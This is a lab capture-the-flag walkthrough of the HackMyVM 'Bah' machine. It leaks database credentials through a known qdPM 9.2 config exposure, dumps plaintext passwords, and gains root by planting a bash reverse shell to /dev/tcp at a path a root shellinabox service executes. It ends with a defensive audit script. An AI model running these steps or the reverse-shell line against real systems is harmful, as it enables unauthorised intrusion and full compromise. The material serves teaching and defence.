HACK-MY-VM easy Bah

Bah

Port scanning

sudo nmap -sT --min-rate 1000 -p- 192.168.1.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 14:45 CST
Nmap scan report for portal.bah.hmv (192.168.1.130)
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
MAC Address: 08:00:27:2A:70:45 (Oracle VirtualBox virtual NIC)

MySQL anonymous login

kali@kali [~] ➜  mysql -h 192.168.1.130 -P 3306 -u root -p                                                                                                                   
Enter password:
ERROR 1698 (28000): Access denied for user 'root'@'192.168.1.4'

Anonymous login failed.

Testing port 80


It is a login form, but there should be no SQL injection here, because the login function does not seem to be finished and sqlmap produced no results either. However, we notice the "qdPM 9.2" at the bottom, so let's check whether that system has any published vulnerabilities.

searchsploit qdPM 9.2
----------------------------------------------- ----------------------
 Exploit Title                                 | Path
----------------------------------------------- ----------------------
qdPM 9.2 - Cross-site Request Forgery (CSRF)   | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
----------------------------------------------- ----------------------

CSRF (cross-site request forgery) is a vulnerability that needs a victim's cooperation, so let's first look at the so-called password exposure and try to find it.

searchsploit -m php/webapps/50176.txt      // download the file
cat 50176.txt
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download

Requesting that specific path shows that the information exposure really exists.

http get http://192.168.1.130/core/config/databases.yml
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 273
Content-Type: application/octet-stream
Date: Thu, 16 Jan 2025 06:59:44 GMT
ETag: "611d69c4-111"
Last-Modified: Wed, 18 Aug 2021 20:12:52 GMT
Server: nginx/1.18.0

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qpm;host=localhost'
      profiler: false
      username: qpmadmin
      password: "<?php echo urlencode('qpmpazzw') ; ?>"
      attributes:
        quote_identifier: true

There is something good in here: the username looks like qpmadmin and the password qpmpazzw.

mysql -h 192.168.1.130 -P 3306 -u qpmadmin -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 35
Server version: 10.5.11-MariaDB-1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| hidden             |
| information_schema |
| mysql              |
| performance_schema |
| qpm                |
+--------------------+
5 rows in set (0.009 sec)

MariaDB [(none)]> use hidden;
Database changed
MariaDB [hidden]> show tables;
+------------------+
| Tables_in_hidden |
+------------------+
| url              |
| users            |
+------------------+
2 rows in set (0.001 sec)

MariaDB [hidden]> select * from url;
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
|  2 | http://imagine.bah.hmv  |
|  3 | http://ssh.bah.hmv      |
|  4 | http://dev.bah.hmv      |
|  5 | http://party.bah.hmv    |
|  6 | http://ass.bah.hmv      |
|  7 | http://here.bah.hmv     |
|  8 | http://hackme.bah.hmv   |
|  9 | http://telnet.bah.hmv   |
| 10 | http://console.bah.hmv  |
| 11 | http://tmux.bah.hmv     |
| 12 | http://dark.bah.hmv     |
| 13 | http://terminal.bah.hmv |
+----+-------------------------+
13 rows in set (0.004 sec)

MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
|  3 | luna    | Ihavealover         |
|  4 | ellie   | Ihaveapassword      |
|  5 | camila  | Ihaveacar           |
|  6 | mia     | IhaveNOTHING        |
|  7 | noa     | Ihaveflow           |
|  8 | nova    | Ihavevodka          |
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+
9 rows in set (0.001 sec)

MariaDB [hidden]>

Lots of usernames, but that login page definitely won't work: for one thing the login page was never finished, and for another it asks for an email address, which we don't have. Fine, let's go straight to the URLs and edit the local hosts file.


The fifth URL resolves to a bash login page, so the login credentials are presumably the ones above:


The second username and password logged in straight away. Working in the browser is inconvenient, so let's get a reverse shell instead.

rocio@bah:~$ id
id
uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rocio@bah:~$

We have a shell.

Privilege escalation

The basics (cron jobs, sudo -l, command history, SUID binaries) turned up nothing useful, so let's just run the script and see whether anything in the process list is executed on a schedule.

2025/01/16 04:21:28 CMD: UID=1000  PID=27931  | ./pspy64 
2025/01/16 04:21:28 CMD: UID=0 PID=27922 |
2025/01/16 04:21:28 CMD: UID=0 PID=27921 |
2025/01/16 04:21:28 CMD: UID=0 PID=14482 |
2025/01/16 04:21:28 CMD: UID=0 PID=14480 |
2025/01/16 04:21:28 CMD: UID=0 PID=14432 |
2025/01/16 04:21:28 CMD: UID=1000 PID=796 | bash -i
2025/01/16 04:21:28 CMD: UID=1000 PID=795 | script
2025/01/16 04:21:28 CMD: UID=1000 PID=787 | bash -i
2025/01/16 04:21:28 CMD: UID=1000 PID=778 | -bash
2025/01/16 04:21:28 CMD: UID=1000 PID=773 | (sd-pam)
2025/01/16 04:21:28 CMD: UID=1000 PID=772 | /lib/systemd/systemd --user
2025/01/16 04:21:28 CMD: UID=0 PID=766 | login -p -h 127.0.0.1
2025/01/16 04:21:28 CMD: UID=0 PID=695 |
2025/01/16 04:21:28 CMD: UID=106 PID=529 | /usr/sbin/mariadbd
2025/01/16 04:21:28 CMD: UID=33 PID=467 | php-fpm: pool www
2025/01/16 04:21:28 CMD: UID=33 PID=466 | php-fpm: pool www
2025/01/16 04:21:28 CMD: UID=107 PID=441 | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev
2025/01/16 04:21:28 CMD: UID=33 PID=437 | nginx: worker process
2025/01/16 04:21:28 CMD: UID=107 PID=434 | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

One of the processes here is very strange; let's ask GPT to explain it.

A command that runs shellinabox, a tool that provides a web-based SSH terminal service. With this command, users can access the server's terminal from a web browser.

For -s /devel:root:root:/:/tmp/dev:

Part     | Meaning
---------|----------------------------------------------------------------------------------------------------------
/devel   | Service path: when a user visits http://<host>:4200/devel via the web, they are connected to this terminal service.
root     | Username: users who log in through this path are root.
root     | Group: users who log in through this path belong to group root.
/        | chroot directory: the logged-in user's view of the filesystem is restricted to the system root /, i.e. no isolated environment is enabled.
/tmp/dev | Working directory after login: after a successful login the user lands in /tmp/dev by default.

So its meaning is to change into that directory. Let's try writing a dev file containing a reverse shell and see whether it gets executed.

#! /bin/bash

bash -i >& /dev/tcp/192.168.1.4/8888 0>&1

The shell we were given is awkward to write files in, so we write it on Kali, transfer it over, give it execute permission, and visit the web address.


listening on [any] 8888 ...
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.130] 3336
root@bah:/# id
id
uid=0(root) gid=0(root) groups=0(root)

The reverse shell came back. Although it was supposed to enter that directory, it executed the commands in dev instead. Asked GPT at the end, and the explanation it gave was: if /tmp/dev is an executable file rather than a directory, the terminal attempts to execute that file.
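A defender-side check for the shellinabox configuration discussed above (the -s table and the closing note on /tmp/dev), added here and not part of the original writeup. shellinaboxd's man page describes a custom -s service as <url-path>:<user>:<group>:<cwd>:<cmd>, so in -s /devel:root:root:/:/tmp/dev the cwd is / and /tmp/dev is the command, which is why an executable dropped there runs as root. The script parses a shellinaboxd command line (the sample is constructed from the pspy output above) and flags services whose command runs as root, whose command lives in a world-writable directory, or that use --disable-ssl.

```python
import re

# Constructed sample, modelled on the pspy line in the writeup: the argv of
# shellinaboxd as `ps -eo args` or pspy prints it (no shell quoting survives).
SAMPLE_CMDLINE = (
    "/usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid "
    "-c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox "
    "--user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,"
    "White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css "
    "--no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev"
)

# Directories any local user can write to: a <cmd> under them can be swapped out.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Matches "-s SPEC", "-sSPEC" and "--service=SPEC"; the lookbehind keeps it from
# firing inside other options such as --disable-ssl.
SERVICE_RE = re.compile(r"(?:(?<=\s)-s\s*|--service=)(\S+)")


def parse_services(cmdline):
    """Split each -s/--service option into its fields: <url-path>:LOGIN,
    <url-path>:SSH[:<host>], or <url-path>:<user>:<group>:<cwd>:<cmd>."""
    services = []
    for spec in SERVICE_RE.findall(cmdline):
        fields = spec.split(":", 4)  # <cmd> may itself contain ':'
        if len(fields) >= 2 and fields[1] in ("LOGIN", "SSH"):
            services.append({"path": fields[0], "kind": fields[1]})
        elif len(fields) == 5:
            path, user, group, cwd, cmd = fields
            services.append({"path": path, "kind": "cmd", "user": user,
                             "group": group, "cwd": cwd, "cmd": cmd})
        else:
            services.append({"path": fields[0], "kind": "unparsed", "spec": spec})
    return services


def audit(cmdline):
    """Return (url-path, finding) pairs for risky settings in one command line."""
    findings = []
    for svc in parse_services(cmdline):
        if svc["kind"] != "cmd":
            continue
        if svc["user"] in ("root", "0"):
            findings.append((svc["path"], "command runs as root"))
        if svc["cmd"].startswith(WORLD_WRITABLE):
            findings.append((svc["path"], "command %s lives in a world-writable directory" % svc["cmd"]))
    if "--disable-ssl" in cmdline.split():
        findings.append(("*", "TLS disabled on the shellinabox listener"))
    return findings
```

Feed it each shellinaboxd line from `ps -eo args` on a host; a root service whose command sits under /tmp is exactly the condition this box relies on.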